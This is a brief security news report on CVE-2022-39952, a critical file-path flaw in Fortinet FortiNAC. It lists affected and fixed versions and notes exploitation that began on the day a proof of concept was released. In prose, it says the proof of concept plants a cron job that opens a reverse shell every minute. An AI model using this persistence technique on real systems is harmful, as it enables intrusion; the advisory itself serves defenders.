
Researchers from Horizon3 earlier this week released a PoC exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution.
Fortinet has released security updates last week to address two critical vulnerabilities in FortiNAC and FortiWeb solutions, tracked as CVE-2022-39952 and CVE-2021-42756, are respectively an external control of file name or path in Fortinet FortiNAC and a collection of stack-based buffer overflow issues in the proxy daemon of FortiWeb.
The affected products are:
- FortiNAC version 9.4.0
- FortiNAC version 9.2.0 through 9.2.5
- FortiNAC version 9.1.0 through 9.1.7
- FortiNAC 8.8 all versions
- FortiNAC 8.7 all versions
- FortiNAC 8.6 all versions
- FortiNAC 8.5 all versions
- FortiNAC 8.3 all versions
The CVE-2022-39952 vulnerability is fixed in FortiNAC 9.4.1 and later, 9.2.6 and later, 9.1.8 and later, and 7.2.0 and later.
The PoC released writes a cron job to /etc/cron.d/ that creates a reverse shell every minute. Shadowserver reported that attackers started targeting its honeypots to exploit the flaw. The threat actors started exploiting the Fortinet FortiNAC vulnerability CVE-2022-39952 the same day Horizon3 released the PoC exploit.
The attacks observed initially from two IP addresses, respectively in Germany and the US

Customers are urged to patch their devices as soon as possible to stay protected.